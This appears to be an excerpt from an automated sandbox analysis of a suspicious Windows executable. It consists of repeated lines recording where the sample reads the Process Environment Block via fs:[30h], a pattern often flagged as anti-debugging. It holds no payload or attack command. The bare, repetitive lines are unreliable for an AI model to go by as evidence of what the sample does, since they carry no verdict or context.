Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103C073 mov eax, dword ptr fs:[00000030h]	3_2_0103C073
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101208A mov eax, dword ptr fs:[00000030h]	3_2_0101208A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010080A0 mov eax, dword ptr fs:[00000030h]	3_2_010080A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A80A8 mov eax, dword ptr fs:[00000030h]	3_2_010A80A8
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D60B8 mov eax, dword ptr fs:[00000030h]	3_2_010D60B8
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D60B8 mov ecx, dword ptr fs:[00000030h]	3_2_010D60B8
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010920DE mov eax, dword ptr fs:[00000030h]	3_2_010920DE
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_0100A0E3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010180E9 mov eax, dword ptr fs:[00000030h]	3_2_010180E9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010960E0 mov eax, dword ptr fs:[00000030h]	3_2_010960E0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100C0F0 mov eax, dword ptr fs:[00000030h]	3_2_0100C0F0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010520F0 mov ecx, dword ptr fs:[00000030h]	3_2_010520F0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A30B mov eax, dword ptr fs:[00000030h]	3_2_0104A30B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A30B mov eax, dword ptr fs:[00000030h]	3_2_0104A30B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A30B mov eax, dword ptr fs:[00000030h]	3_2_0104A30B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100C310 mov ecx, dword ptr fs:[00000030h]	3_2_0100C310
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01030310 mov ecx, dword ptr fs:[00000030h]	3_2_01030310
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E8324 mov eax, dword ptr fs:[00000030h]	3_2_010E8324
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E8324 mov ecx, dword ptr fs:[00000030h]	3_2_010E8324
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E8324 mov eax, dword ptr fs:[00000030h]	3_2_010E8324
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E8324 mov eax, dword ptr fs:[00000030h]	3_2_010E8324
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01092349 mov eax, dword ptr fs:[00000030h]	3_2_01092349
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E634F mov eax, dword ptr fs:[00000030h]	3_2_010E634F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109035C mov eax, dword ptr fs:[00000030h]	3_2_0109035C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109035C mov eax, dword ptr fs:[00000030h]	3_2_0109035C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109035C mov eax, dword ptr fs:[00000030h]	3_2_0109035C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109035C mov ecx, dword ptr fs:[00000030h]	3_2_0109035C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109035C mov eax, dword ptr fs:[00000030h]	3_2_0109035C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109035C mov eax, dword ptr fs:[00000030h]	3_2_0109035C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B8350 mov ecx, dword ptr fs:[00000030h]	3_2_010B8350
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DA352 mov eax, dword ptr fs:[00000030h]	3_2_010DA352
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B437C mov eax, dword ptr fs:[00000030h]	3_2_010B437C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100E388 mov eax, dword ptr fs:[00000030h]	3_2_0100E388
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100E388 mov eax, dword ptr fs:[00000030h]	3_2_0100E388
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100E388 mov eax, dword ptr fs:[00000030h]	3_2_0100E388
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103438F mov eax, dword ptr fs:[00000030h]	3_2_0103438F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103438F mov eax, dword ptr fs:[00000030h]	3_2_0103438F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01008397 mov eax, dword ptr fs:[00000030h]	3_2_01008397
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01008397 mov eax, dword ptr fs:[00000030h]	3_2_01008397
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01008397 mov eax, dword ptr fs:[00000030h]	3_2_01008397
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010CC3CD mov eax, dword ptr fs:[00000030h]	3_2_010CC3CD
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0101A3C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0101A3C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0101A3C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0101A3C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0101A3C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0101A3C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010183C0 mov eax, dword ptr fs:[00000030h]	3_2_010183C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010183C0 mov eax, dword ptr fs:[00000030h]	3_2_010183C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010183C0 mov eax, dword ptr fs:[00000030h]	3_2_010183C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010183C0 mov eax, dword ptr fs:[00000030h]	3_2_010183C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010963C0 mov eax, dword ptr fs:[00000030h]	3_2_010963C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE3DB mov eax, dword ptr fs:[00000030h]	3_2_010BE3DB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE3DB mov eax, dword ptr fs:[00000030h]	3_2_010BE3DB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE3DB mov ecx, dword ptr fs:[00000030h]	3_2_010BE3DB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BE3DB mov eax, dword ptr fs:[00000030h]	3_2_010BE3DB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B43D4 mov eax, dword ptr fs:[00000030h]	3_2_010B43D4
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B43D4 mov eax, dword ptr fs:[00000030h]	3_2_010B43D4
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010203E9 mov eax, dword ptr fs:[00000030h]	3_2_010203E9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010203E9 mov eax, dword ptr fs:[00000030h]	3_2_010203E9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010203E9 mov eax, dword ptr fs:[00000030h]	3_2_010203E9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010203E9 mov eax, dword ptr fs:[00000030h]	3_2_010203E9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010203E9 mov eax, dword ptr fs:[00000030h]	3_2_010203E9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010203E9 mov eax, dword ptr fs:[00000030h]	3_2_010203E9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010203E9 mov eax, dword ptr fs:[00000030h]	3_2_010203E9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010203E9 mov eax, dword ptr fs:[00000030h]	3_2_010203E9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0102E3F0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0102E3F0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0102E3F0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010463FF mov eax, dword ptr fs:[00000030h]	3_2_010463FF
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100823B mov eax, dword ptr fs:[00000030h]	3_2_0100823B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01098243 mov eax, dword ptr fs:[00000030h]	3_2_01098243
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01098243 mov ecx, dword ptr fs:[00000030h]	3_2_01098243
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100A250 mov eax, dword ptr fs:[00000030h]	3_2_0100A250
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E625D mov eax, dword ptr fs:[00000030h]	3_2_010E625D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01016259 mov eax, dword ptr fs:[00000030h]	3_2_01016259
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010CA250 mov eax, dword ptr fs:[00000030h]	3_2_010CA250
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010CA250 mov eax, dword ptr fs:[00000030h]	3_2_010CA250
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01014260 mov eax, dword ptr fs:[00000030h]	3_2_01014260
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01014260 mov eax, dword ptr fs:[00000030h]	3_2_01014260
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01014260 mov eax, dword ptr fs:[00000030h]	3_2_01014260
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100826B mov eax, dword ptr fs:[00000030h]	3_2_0100826B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E284 mov eax, dword ptr fs:[00000030h]	3_2_0104E284
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E284 mov eax, dword ptr fs:[00000030h]	3_2_0104E284
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01090283 mov eax, dword ptr fs:[00000030h]	3_2_01090283
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01090283 mov eax, dword ptr fs:[00000030h]	3_2_01090283
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01090283 mov eax, dword ptr fs:[00000030h]	3_2_01090283
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010202A0 mov eax, dword ptr fs:[00000030h]	3_2_010202A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010202A0 mov eax, dword ptr fs:[00000030h]	3_2_010202A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A62A0 mov eax, dword ptr fs:[00000030h]	3_2_010A62A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A62A0 mov ecx, dword ptr fs:[00000030h]	3_2_010A62A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A62A0 mov eax, dword ptr fs:[00000030h]	3_2_010A62A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A62A0 mov eax, dword ptr fs:[00000030h]	3_2_010A62A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A62A0 mov eax, dword ptr fs:[00000030h]	3_2_010A62A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A62A0 mov eax, dword ptr fs:[00000030h]	3_2_010A62A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0101A2C3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0101A2C3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0101A2C3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0101A2C3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0101A2C3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E62D6 mov eax, dword ptr fs:[00000030h]	3_2_010E62D6
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010202E1 mov eax, dword ptr fs:[00000030h]	3_2_010202E1
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010202E1 mov eax, dword ptr fs:[00000030h]	3_2_010202E1
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010202E1 mov eax, dword ptr fs:[00000030h]	3_2_010202E1
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A6500 mov eax, dword ptr fs:[00000030h]	3_2_010A6500
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4500 mov eax, dword ptr fs:[00000030h]	3_2_010E4500
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4500 mov eax, dword ptr fs:[00000030h]	3_2_010E4500
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4500 mov eax, dword ptr fs:[00000030h]	3_2_010E4500
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4500 mov eax, dword ptr fs:[00000030h]	3_2_010E4500
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4500 mov eax, dword ptr fs:[00000030h]	3_2_010E4500
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4500 mov eax, dword ptr fs:[00000030h]	3_2_010E4500
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4500 mov eax, dword ptr fs:[00000030h]	3_2_010E4500
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020535 mov eax, dword ptr fs:[00000030h]	3_2_01020535
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020535 mov eax, dword ptr fs:[00000030h]	3_2_01020535
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020535 mov eax, dword ptr fs:[00000030h]	3_2_01020535
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020535 mov eax, dword ptr fs:[00000030h]	3_2_01020535
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020535 mov eax, dword ptr fs:[00000030h]	3_2_01020535
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020535 mov eax, dword ptr fs:[00000030h]	3_2_01020535
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E53E mov eax, dword ptr fs:[00000030h]	3_2_0103E53E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E53E mov eax, dword ptr fs:[00000030h]	3_2_0103E53E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E53E mov eax, dword ptr fs:[00000030h]	3_2_0103E53E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E53E mov eax, dword ptr fs:[00000030h]	3_2_0103E53E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E53E mov eax, dword ptr fs:[00000030h]	3_2_0103E53E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01018550 mov eax, dword ptr fs:[00000030h]	3_2_01018550
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01018550 mov eax, dword ptr fs:[00000030h]	3_2_01018550
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104656A mov eax, dword ptr fs:[00000030h]	3_2_0104656A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104656A mov eax, dword ptr fs:[00000030h]	3_2_0104656A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104656A mov eax, dword ptr fs:[00000030h]	3_2_0104656A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01012582 mov eax, dword ptr fs:[00000030h]	3_2_01012582
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01012582 mov ecx, dword ptr fs:[00000030h]	3_2_01012582
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01044588 mov eax, dword ptr fs:[00000030h]	3_2_01044588
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E59C mov eax, dword ptr fs:[00000030h]	3_2_0104E59C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010905A7 mov eax, dword ptr fs:[00000030h]	3_2_010905A7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010905A7 mov eax, dword ptr fs:[00000030h]	3_2_010905A7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010905A7 mov eax, dword ptr fs:[00000030h]	3_2_010905A7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010345B1 mov eax, dword ptr fs:[00000030h]	3_2_010345B1
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010345B1 mov eax, dword ptr fs:[00000030h]	3_2_010345B1
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E5CF mov eax, dword ptr fs:[00000030h]	3_2_0104E5CF
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E5CF mov eax, dword ptr fs:[00000030h]	3_2_0104E5CF
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010165D0 mov eax, dword ptr fs:[00000030h]	3_2_010165D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0104A5D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A5D0 mov eax, dword ptr fs:[00000030h]	3_2_0104A5D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010125E0 mov eax, dword ptr fs:[00000030h]	3_2_010125E0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0103E5E7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0103E5E7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0103E5E7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0103E5E7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0103E5E7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0103E5E7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0103E5E7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E5E7 mov eax, dword ptr fs:[00000030h]	3_2_0103E5E7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104C5ED mov eax, dword ptr fs:[00000030h]	3_2_0104C5ED
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104C5ED mov eax, dword ptr fs:[00000030h]	3_2_0104C5ED
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01048402 mov eax, dword ptr fs:[00000030h]	3_2_01048402
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01048402 mov eax, dword ptr fs:[00000030h]	3_2_01048402
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01048402 mov eax, dword ptr fs:[00000030h]	3_2_01048402
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100E420 mov eax, dword ptr fs:[00000030h]	3_2_0100E420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100E420 mov eax, dword ptr fs:[00000030h]	3_2_0100E420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100E420 mov eax, dword ptr fs:[00000030h]	3_2_0100E420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100C427 mov eax, dword ptr fs:[00000030h]	3_2_0100C427
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01096420 mov eax, dword ptr fs:[00000030h]	3_2_01096420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01096420 mov eax, dword ptr fs:[00000030h]	3_2_01096420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01096420 mov eax, dword ptr fs:[00000030h]	3_2_01096420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01096420 mov eax, dword ptr fs:[00000030h]	3_2_01096420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01096420 mov eax, dword ptr fs:[00000030h]	3_2_01096420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01096420 mov eax, dword ptr fs:[00000030h]	3_2_01096420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01096420 mov eax, dword ptr fs:[00000030h]	3_2_01096420
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A430 mov eax, dword ptr fs:[00000030h]	3_2_0104A430
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E443 mov eax, dword ptr fs:[00000030h]	3_2_0104E443
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E443 mov eax, dword ptr fs:[00000030h]	3_2_0104E443
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E443 mov eax, dword ptr fs:[00000030h]	3_2_0104E443
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E443 mov eax, dword ptr fs:[00000030h]	3_2_0104E443
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E443 mov eax, dword ptr fs:[00000030h]	3_2_0104E443
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E443 mov eax, dword ptr fs:[00000030h]	3_2_0104E443
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E443 mov eax, dword ptr fs:[00000030h]	3_2_0104E443
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104E443 mov eax, dword ptr fs:[00000030h]	3_2_0104E443
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103245A mov eax, dword ptr fs:[00000030h]	3_2_0103245A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010CA456 mov eax, dword ptr fs:[00000030h]	3_2_010CA456
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100645D mov eax, dword ptr fs:[00000030h]	3_2_0100645D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109C460 mov ecx, dword ptr fs:[00000030h]	3_2_0109C460
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103A470 mov eax, dword ptr fs:[00000030h]	3_2_0103A470
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103A470 mov eax, dword ptr fs:[00000030h]	3_2_0103A470
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103A470 mov eax, dword ptr fs:[00000030h]	3_2_0103A470
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010CA49A mov eax, dword ptr fs:[00000030h]	3_2_010CA49A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010164AB mov eax, dword ptr fs:[00000030h]	3_2_010164AB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010444B0 mov ecx, dword ptr fs:[00000030h]	3_2_010444B0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109A4B0 mov eax, dword ptr fs:[00000030h]	3_2_0109A4B0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010104E5 mov ecx, dword ptr fs:[00000030h]	3_2_010104E5
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104C700 mov eax, dword ptr fs:[00000030h]	3_2_0104C700
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01010710 mov eax, dword ptr fs:[00000030h]	3_2_01010710
